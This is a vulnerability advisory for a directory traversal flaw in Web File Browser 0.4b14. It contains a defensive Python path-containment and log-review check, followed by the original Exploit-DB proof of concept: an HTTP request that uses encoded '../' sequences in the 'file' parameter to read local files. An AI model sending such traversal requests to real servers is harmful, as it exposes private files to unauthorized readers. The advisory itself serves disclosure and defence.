Vendor: Web File Browser
By: Sangyun YOO
CVSS: 8.8 (HIGH)
Title: File Download Vulnerability
CWE: 22
Product Name: Web File Browser
Affected Version From: 0.4b14
Affected Version To: 0.4b14
Patch Exists: YES
Related CWE: N/A
CPE: a:web_file_browser:web_file_browser:0.4b14
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows 7 Starter K
Date: 2011

Web File Browser 0.4b14 File Download Vulnerability

An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable server. The `file` parameter of the download action is used to build the path on disk without checking for directory traversal sequences (`../`, URL-encoded as `..%2f`), so the URL can name a local file outside the shared directory. The vulnerable server then responds with the contents of that local file.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of the software.
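As an added illustration (not code from the advisory or from the Web File Browser project), the following Python shows the containment check a hardened download handler should apply to the `subdir` and `file` parameters, and runs the same check over a few constructed request lines modelled on the advisory's request, so it doubles as a log-review filter. The share root `/var/www/share` and the sample lines are assumptions.

```python
import posixpath
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample request lines (not real traffic), modelled on the
# request shown in the advisory; the second uses the same absolute-URI form.
SAMPLE_REQUEST_LINES = [
    "GET /webFileBrowser.php?act=download&subdir=&sortby=name&file=report.pdf HTTP/1.1",
    "GET http://192.168.0.189/webFileBrowser.php?act=download&subdir=&sortby=name"
    "&file=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1",
    "GET /webFileBrowser.php?act=download&subdir=&sortby=name&file=%252e%252e%2fconfig.php HTTP/1.1",
    "GET /webFileBrowser.php?act=download&subdir=docs&sortby=name&file=..%2fnotes.txt HTTP/1.1",
]

SHARE_ROOT = "/var/www/share"  # assumed directory the file browser is meant to expose


def resolve_requested_path(subdir, filename, root=SHARE_ROOT):
    """Return the normalised absolute path the request would resolve to.

    Percent-decoding is repeated until it no longer changes the string, so a
    double-encoded '%252e%252e' is treated exactly like '..'.
    """
    def full_decode(s):
        prev = None
        while prev != s:
            prev, s = s, unquote(s)
        return s

    rel = posixpath.join(full_decode(subdir), full_decode(filename))
    # posixpath.join discards root if rel is absolute, so an absolute 'file'
    # value also ends up outside root and is rejected by is_contained().
    return posixpath.normpath(posixpath.join(root, rel))


def is_contained(path, root=SHARE_ROOT):
    """True only if path is root itself or lies strictly below it."""
    root = posixpath.normpath(root)
    return path == root or path.startswith(root + "/")


def check_request_line(line):
    """Parse 'GET <target> HTTP/1.x'; return (file param, resolved path, escaped?)."""
    _method, target, _version = line.split(" ", 2)
    qs = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if qs.get("act", [""])[0] != "download":
        return None
    subdir = qs.get("subdir", [""])[0]
    filename = qs.get("file", [""])[0]
    resolved = resolve_requested_path(subdir, filename)
    return filename, resolved, not is_contained(resolved)


def flag_traversal(lines):
    """Resolved paths of download requests that escape SHARE_ROOT (log review)."""
    return [r[1] for r in map(check_request_line, lines) if r and r[2]]
```

Note that the fourth sample (`subdir=docs&file=..%2fnotes.txt`) contains `..` yet still resolves inside the share root, which is why the check compares the normalised path against the root rather than merely rejecting any `..` substring.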

Exploit-DB raw data:

# Exploit Title: [Web File Browser 0.4b14 File Download Vulnerability]
# Date: [2011/11/03]
# Author: [Sangyun YOO]
# Email: yoosy0302 at naver dot com
# Software Link: [ http://downloads.sourceforge.net/project/webfilebrowser/webfilebrowser/0.4b14/webfilebrowser-0.4b14.zip ]
# Version: [Web File Browser 0.4b14]
# Tested on: [Windows 7 Starter K]
---------------------------------------
 
Using the Paros tool, modify the request line of the request message as follows ==>
 
GET http://192.168.0.189/webFileBrowser.php?act=download&subdir=&sortby=name&file=..%2f..%2f..%2f..%2f..%2f[localfile] HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, application/msword, */*
Accept-Language: ko
UA-CPU: x86
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Proxy-Connection: Keep-Alive
Host: 192.168.0.189
Cookie: user=admin; loginkey=8d28703726be663cd5afb551bbb78be4; AJXP_LAST_KNOWN_VERSION=3.2.4; mx64B616EE8DEC99D3BFE053EAB04DC8=fcf2ad987a6db7670d4510ff9fa82a66; mx1B5F4F6EE7FC1C64773320E0BBE578=fe7c641b1a977587b5b6e0d355072a84; tab_usersconfig=0
 
 
===== Happy Hacking! =====